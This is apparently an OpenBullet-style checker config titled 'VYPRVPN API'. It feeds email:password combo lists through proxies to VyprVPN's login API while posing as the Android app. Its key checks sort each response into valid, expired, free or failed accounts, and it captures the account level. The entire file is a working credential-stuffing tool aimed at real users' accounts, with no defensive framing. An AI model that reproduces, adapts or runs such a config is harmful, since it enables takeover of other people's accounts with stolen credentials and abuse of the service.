[SETTINGS]
{
  "Name": "VYPRVPN API",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-03-03T06:40:44.2279274+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "XIT07",
  "Version": "1.1.0 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://api.goldenfrog.com/settings" 
  
  HEADER "X-API-Version: 2" 
  HEADER "X-API-Features: partial_sign_up;" 
  HEADER "X-GF-PRODUCT: VyprVPN" 
  HEADER "X-GF-PRODUCT-VERSION: 4.3.2.11356" 
  HEADER "X-GF-PLATFORM: Android" 
  HEADER "X-GF-PLATFORM-VERSION: 7.1.2" 
  HEADER "locale: en_US" 
  HEADER "Connection: close" 
  HEADER "username: <USER>" 
  HEADER "password: <PASS>" 
  HEADER "Host: api.goldenfrog.com" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: okhttp/3.14.7" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"confirmed\": true" 
  KEYCHAIN Failure OR 
    KEY "invalid username or password" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "\"locked\"" 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"vpn\": null" 

#Account_Level PARSE "<SOURCE>" JSON "account_level" -> VAR "Account Level" 

